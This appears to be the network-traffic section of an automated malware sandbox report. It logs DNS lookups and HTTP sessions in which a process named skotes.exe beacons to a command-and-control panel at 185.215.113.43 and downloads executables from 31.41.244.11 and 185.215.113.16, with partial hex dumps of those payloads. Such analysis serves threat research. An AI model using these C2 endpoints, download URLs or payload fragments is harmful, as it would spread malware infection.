Dec 14, 2024 13:00:50.035744905 CET	1.1.1.1	192.168.2.4	0xdd5d	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.035744905 CET	1.1.1.1	192.168.2.4	0xdd5d	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.035744905 CET	1.1.1.1	192.168.2.4	0xdd5d	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.035744905 CET	1.1.1.1	192.168.2.4	0xdd5d	No error (0)	youtube-ui.l.google.com		216.58.208.238	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.035744905 CET	1.1.1.1	192.168.2.4	0xdd5d	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.171756029 CET	1.1.1.1	192.168.2.4	0x39f3	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:50.175169945 CET	1.1.1.1	192.168.2.4	0xbae8	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 13:00:50.175169945 CET	1.1.1.1	192.168.2.4	0xbae8	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 13:00:50.175169945 CET	1.1.1.1	192.168.2.4	0xbae8	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 13:00:50.175169945 CET	1.1.1.1	192.168.2.4	0xbae8	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Dec 14, 2024 13:00:50.316993952 CET	1.1.1.1	192.168.2.4	0x7783	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Dec 14, 2024 13:00:50.855303049 CET	1.1.1.1	192.168.2.4	0x3fec	No error (0)	support.mozilla.org	prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:00:50.855303049 CET	1.1.1.1	192.168.2.4	0x3fec	No error (0)	prod.sumo.prod.webservices.mozgcp.net	us-west1.prod.sumo.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:00:50.855303049 CET	1.1.1.1	192.168.2.4	0x3fec	No error (0)	us-west1.prod.sumo.prod.webservices.mozgcp.net		34.149.128.2	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:00:53.839299917 CET	1.1.1.1	192.168.2.4	0x229f	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:13.506719112 CET	1.1.1.1	192.168.2.4	0xe09d	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:13.618344069 CET	1.1.1.1	192.168.2.4	0xe09d	No error (0)	prod.classify-client.prod.webservices.mozgcp.net		35.190.72.216	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:13.846116066 CET	1.1.1.1	192.168.2.4	0xf67b	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:01:13.846116066 CET	1.1.1.1	192.168.2.4	0xf67b	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:13.941755056 CET	1.1.1.1	192.168.2.4	0x3f56	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:01:13.941755056 CET	1.1.1.1	192.168.2.4	0x3f56	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:01:13.941755056 CET	1.1.1.1	192.168.2.4	0x3f56	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:14.000238895 CET	1.1.1.1	192.168.2.4	0x3f56	No error (0)	content-signature-2.cdn.mozilla.net	content-signature-chains.prod.autograph.services.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:01:14.000238895 CET	1.1.1.1	192.168.2.4	0x3f56	No error (0)	content-signature-chains.prod.autograph.services.mozaws.net	prod.content-signature-chains.prod.webservices.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:01:14.000238895 CET	1.1.1.1	192.168.2.4	0x3f56	No error (0)	prod.content-signature-chains.prod.webservices.mozgcp.net		34.160.144.191	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:17.016480923 CET	1.1.1.1	192.168.2.4	0xbbb7	No error (0)	twitter.com		104.244.42.129	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:17.018527985 CET	1.1.1.1	192.168.2.4	0xe3d0	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Dec 14, 2024 13:01:32.998471975 CET	1.1.1.1	192.168.2.4	0x3f35	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:01:32.998471975 CET	1.1.1.1	192.168.2.4	0x3f35	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.177735090 CET	1.1.1.1	192.168.2.4	0xf480	No error (0)	balrog-aus5.r53-2.services.mozilla.com	prod.balrog.prod.cloudops.mozgcp.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:01:43.177735090 CET	1.1.1.1	192.168.2.4	0xf480	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.265865088 CET	1.1.1.1	192.168.2.4	0x88e3	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.265865088 CET	1.1.1.1	192.168.2.4	0x88e3	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.265865088 CET	1.1.1.1	192.168.2.4	0x88e3	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.265865088 CET	1.1.1.1	192.168.2.4	0x88e3	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.316370010 CET	1.1.1.1	192.168.2.4	0x16a9	No error (0)	prod.balrog.prod.cloudops.mozgcp.net		35.244.181.201	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.456331015 CET	1.1.1.1	192.168.2.4	0x35c	No error (0)	services.addons.mozilla.org		151.101.1.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.456331015 CET	1.1.1.1	192.168.2.4	0x35c	No error (0)	services.addons.mozilla.org		151.101.129.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.456331015 CET	1.1.1.1	192.168.2.4	0x35c	No error (0)	services.addons.mozilla.org		151.101.65.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.456331015 CET	1.1.1.1	192.168.2.4	0x35c	No error (0)	services.addons.mozilla.org		151.101.193.91	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:01:43.680665016 CET	1.1.1.1	192.168.2.4	0x24e2	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 13:01:43.680665016 CET	1.1.1.1	192.168.2.4	0x24e2	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 13:01:43.680665016 CET	1.1.1.1	192.168.2.4	0x24e2	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 13:01:43.680665016 CET	1.1.1.1	192.168.2.4	0x24e2	No error (0)	services.addons.mozilla.org			28	IN (0x0001)	false
Dec 14, 2024 13:01:53.090814114 CET	1.1.1.1	192.168.2.4	0x8ea4	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:02:08.642576933 CET	1.1.1.1	192.168.2.4	0x9c59	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:02:13.748980045 CET	1.1.1.1	192.168.2.4	0xac8b	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:02:34.759807110 CET	1.1.1.1	192.168.2.4	0x17e0	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:02:36.124011993 CET	1.1.1.1	192.168.2.4	0x6fa5	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:02:36.124011993 CET	1.1.1.1	192.168.2.4	0x6fa5	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:03:56.305897951 CET	1.1.1.1	192.168.2.4	0x6e18	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:03:56.447447062 CET	1.1.1.1	192.168.2.4	0xbdeb	No error (0)	push.services.mozilla.com		34.107.243.93	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:03:57.819284916 CET	1.1.1.1	192.168.2.4	0x2cde	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:03:57.819284916 CET	1.1.1.1	192.168.2.4	0x2cde	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:04:15.167330980 CET	1.1.1.1	192.168.2.4	0xd53a	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:04:15.308636904 CET	1.1.1.1	192.168.2.4	0x75e	No error (0)	telemetry-incoming.r53-2.services.mozilla.com		34.120.208.123	A (IP address)	IN (0x0001)	false
Dec 14, 2024 13:04:16.652108908 CET	1.1.1.1	192.168.2.4	0x6dfe	No error (0)	detectportal.firefox.com	detectportal.prod.mozaws.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 14, 2024 13:04:16.652108908 CET	1.1.1.1	192.168.2.4	0x6dfe	No error (0)	prod.detectportal.prod.cloudops.mozgcp.net		34.107.221.82	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49748	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:03.959017038 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 14, 2024 12:56:05.291898966 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49759	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:06.917507887 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Dec 14, 2024 12:56:08.288912058 CET	978	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 31 33 0d 0a 20 3c 63 3e 31 30 31 35 31 34 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 64 32 61 63 31 31 31 31 62 65 39 30 36 62 33 31 39 31 36 30 33 36 35 62 33 38 64 62 37 33 33 65 33 38 61 39 61 35 35 33 36 65 36 23 31 30 31 35 31 36 36 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 66 37 62 38 63 37 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 35 31 36 37 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 35 31 36 38 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 [TRUNCATED] Data Ascii: 313 <c>1015146001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9d2ac1111be906b319160365b38db733e38a9a5536e6#1015166001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1015167001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1015168001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1015169001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc96a805145b002ab5e45425197d1aa1daaa8#1015170001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbcd7e864403ac52ea484b411b9dc4e1#1015171001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbce71914e54a61cf64d4a485a9592e100b7#1015172001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc37a9e4d15ef02ab5e45425197d1aa1daaa8#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49760	31.41.244.11	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:08.413773060 CET	66	OUT	GET /files/6530775752/PK13K1G.exe HTTP/1.1 Host: 31.41.244.11
Dec 14, 2024 12:56:09.753144979 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:09 GMT Content-Type: application/octet-stream Content-Length: 406528 Last-Modified: Sat, 14 Dec 2024 10:06:57 GMT Connection: keep-alive ETag: "675d58c1-63400" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 49 5c 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 0e 01 00 00 9e 00 00 00 00 00 00 5c 4c 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 06 00 00 06 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 7e 01 00 28 00 00 00 00 d0 01 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 fc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 28 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 ac 7f [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELbI\g"\L@@D~((@.text `.rdatar t@@.data@.OO@.rsrc@@.reloc@B.bss@
Dec 14, 2024 12:56:09.753190994 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:09.753227949 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 14, 2024 12:56:09.753279924 CET	1236	IN	Data Raw: 45 ec 80 39 40 00 64 8b 15 00 00 00 00 89 55 e8 64 a3 00 00 00 00 89 4d e0 8b 4d e0 89 4d d8 8a 55 dc 89 e0 88 10 e8 f8 1c 00 00 83 ec 04 e9 00 00 00 00 90 8b 4d 08 89 e0 89 08 e8 f3 1e 00 00 89 c1 89 e0 89 08 e8 38 18 00 00 8b 4d d8 89 c6 8b 55 Data Ascii: E9@dUdMMMUM8MUEp=EMd$^_[]UM]UEEEE9@dUdMEEM
Dec 14, 2024 12:56:09.753371954 CET	1236	IN	Data Raw: 40 0c 1c 00 00 00 c7 40 08 00 a0 41 00 c7 40 04 49 05 00 00 c7 00 1c a0 41 00 e8 30 fc ff ff c7 45 dc 01 00 00 00 c7 45 c8 00 00 00 00 8b 45 cc 35 28 01 06 8d 89 45 c8 8d 45 f0 8b 4d 0c 8b 55 08 89 14 24 89 4c 24 04 89 44 24 08 c7 44 24 0c 0a 00 Data Ascii: @@A@IA0EEE5(EEMU$L$D$D$EA$D$E}E5x^EAE$D$ID$@D$UE$1EM1n#EP]UWVEE
Dec 14, 2024 12:56:09.753407001 CET	672	IN	Data Raw: ff ff e8 d4 00 00 00 8b 85 dc fe ff ff 89 85 d4 fe ff ff 83 f8 00 0f 84 25 00 00 00 e9 00 00 00 00 90 8b 8d d4 fe ff ff e8 7e 01 00 00 e9 00 00 00 00 90 8b 85 d4 fe ff ff 89 04 24 e8 e4 1e 00 00 90 8b 45 e8 64 a3 00 00 00 00 81 c4 2c 01 00 00 5e Data Ascii: %~$Ed,^_[]DU]@U]UEEMMMEU$D$E]U,A1EMMM
Dec 14, 2024 12:56:09.753489017 CET	1236	IN	Data Raw: 00 00 00 00 90 8b 45 e0 8b 4d f0 64 89 0d 00 00 00 00 83 c4 24 5b 5d c2 04 00 90 55 83 ec 08 83 c5 04 90 8b 4d e0 e8 30 01 00 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 50 89 4d fc 8b 4d fc e8 81 01 00 00 83 c4 04 5d c3 cc cc cc Data Ascii: EMd$[]UM0]UPMM]UEEEEE9@dUdMMMBEMd]UM]U(EA1EMEEMMEE
Dec 14, 2024 12:56:09.753523111 CET	224	IN	Data Raw: 3a 40 00 64 8b 15 00 00 00 00 89 55 f4 64 a3 00 00 00 00 89 4d ec 8b 4d ec 89 4d e8 89 e0 c7 00 da 53 41 00 e8 5e 02 00 00 83 ec 04 e9 00 00 00 00 90 8b 45 e8 c7 00 20 20 41 00 e9 00 00 00 00 90 8b 45 e8 8b 4d f4 64 89 0d 00 00 00 00 83 c4 1c 5d Data Ascii: :@dUdMMMSA^E AEMd]@UPM]UEEEEE:@dUdMMMU[E AEMd
Dec 14, 2024 12:56:09.753592968 CET	1236	IN	Data Raw: 00 83 c4 1c 5d c2 04 00 66 66 66 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 50 83 c5 00 90 8b 4d e8 e8 22 02 00 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 1c 90 8b 45 08 89 e0 89 45 f0 c7 45 fc ff ff ff ff 8d 45 f4 c7 45 Data Ascii: ]ffffff.UPM"]UEEEEE:@dUdMMMU[E!AEMd]ffffff.UPMB]UEMEE(!A
Dec 14, 2024 12:56:09.753642082 CET	1236	IN	Data Raw: 0c 00 00 00 90 8b 45 e0 89 04 24 e8 ed 11 00 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 24 90 8b 45 08 89 e0 89 45 f0 c7 45 fc ff ff ff ff 8d 45 f4 c7 45 f8 60 3b 40 00 64 8b 15 00 00 00 00 89 55 f4 64 a3 00 00 00 Data Ascii: E$]U$EEEEE`;@dUdMEEEEEMEE$mEMd$]fffff.UPEE$-]UEEA
Dec 14, 2024 12:56:09.873672009 CET	1236	IN	Data Raw: f3 ff ff 8b 4d f0 e8 84 00 00 00 a8 01 0f 85 05 00 00 00 e9 31 00 00 00 8b 4d e8 e8 bf f0 ff ff 89 45 ec 8b 45 f0 8b 40 14 8b 4d f0 8b 09 8b 55 ec 89 14 24 89 4c 24 04 89 44 24 08 e8 6e 00 00 00 8b 4d f0 e8 96 00 00 00 8b 45 f0 c7 40 10 00 00 00 Data Ascii: M1MEE@MU$L$D$nME@E@EME$D$LM1$]UPMEx$]UEEEMEU$D$)]UME$<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49772	185.215.113.43	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:13.058907986 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 35 31 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015146001&unit=246122658369
Dec 14, 2024 12:56:14.406644106 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49778	185.215.113.16	80	3688	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 14, 2024 12:56:14.608192921 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 14, 2024 12:56:15.940367937 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 14 Dec 2024 11:56:15 GMT Content-Type: application/octet-stream Content-Length: 970240 Last-Modified: Sat, 14 Dec 2024 10:55:25 GMT Connection: keep-alive ETag: "675d641d-ece00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 64 5d 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1e 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELd]g"w@0V@@@d\|@Lcu4@.text `.rdata@@.datalpH@.rsrcLc@d@@.relocuvX@B
Dec 14, 2024 12:56:15.940381050 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Dec 14, 2024 12:56:15.940388918 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 14, 2024 12:56:15.940591097 CET	672	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Dec 14, 2024 12:56:15.940602064 CET	1236	IN	Data Raw: 27 ff d6 53 6a 11 88 47 28 ff d6 53 6a 12 88 47 24 ff d6 88 47 25 5f 5e 5b c3 55 8b ec 51 57 33 ff 8d 45 fc 57 50 57 68 00 20 00 00 89 7d fc ff 15 f0 c5 49 00 8b 45 fc 6a 02 57 57 68 01 20 00 00 a3 94 25 4d 00 ff 15 f0 c5 49 00 5f c9 c3 55 8b ec Data Ascii: 'SjG(SjG$G%_^[UQW3EWPWh }IEjWWh %MI_U=Mt_E%\M%PMXMtIhFM2j3YYuj5%Mjh I\M]3@Usy!xwJxnEP
